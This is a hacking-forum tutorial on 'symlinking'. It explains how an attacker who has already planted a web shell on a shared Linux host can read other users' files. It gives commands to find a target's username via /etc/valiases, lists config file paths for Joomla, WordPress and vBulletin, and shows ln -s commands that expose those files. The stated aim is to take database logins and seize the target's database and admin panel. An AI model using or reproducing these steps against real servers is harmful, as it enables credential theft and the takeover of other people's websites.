Symlink Tutorial

Posted by 67 On 05:07

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++
[+]Tutorial Name: How To Symlink +
[+]Tutorial By dR.EviL +
[+]Writed For # Members +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++
[#]Tools For This Tutorial +
[+]A SHell Upload In The Server +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++
Symlink is used to get admin access to your target website hosted in the same server. With Symlink you can bypass the security of server , and read the files of other users in the linux server. So if we have uploaded a shell in the server of target website , but in another user , we can easily read the configuration file of our target . First the shell is needed to symlink .
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++++++++++++++++

First Step Is To Get the user name of the target website in the server , To do this excecute this command

Code:
ls -la /etc/valiases/target.com ( Replace target.com with your target)

The Result Will Be :

Code:
target mail 15 jun 06 2011 /etc/valiases/the username of target.com
The Second Step Is:
Finding The configuration file :(
Below are Some Directions For Config Files In Different Cms..
Code:
In Joomla The Config File Will Be At /home/target/public_html/configuration.php
In WordPress The Config Will Be At /home/target/public_html/wp-config.php
In vBulletin The Config Will Be At /home/target/public_html/includes/config.php

Symliking In Joomla
Now we have to Read the config file to gett admin panel ! Follow This Steps ::::
1- Create a text file in your shelled website example: AL.txt
2- Then go to command execution field and execute that command :
Code:
ln -s /the target of config file AL.txt
examples:
ln -s /home/target/public_html/configuration.php AL.txt
ln -s /home/target/public_html/includes/config.php AL.txt
ln -s /home home/target/public_html/wp-config.php AL.txt
After you execute that command , just read the file AL.txt !
There is written the configuration file of ur target ! Get there the SQL database logins , and then manage its database , upload a MYSQL interface Then the MySQL database of the target website is in ur hands
If you wanna get into its administration , just edit some values there !

Categories: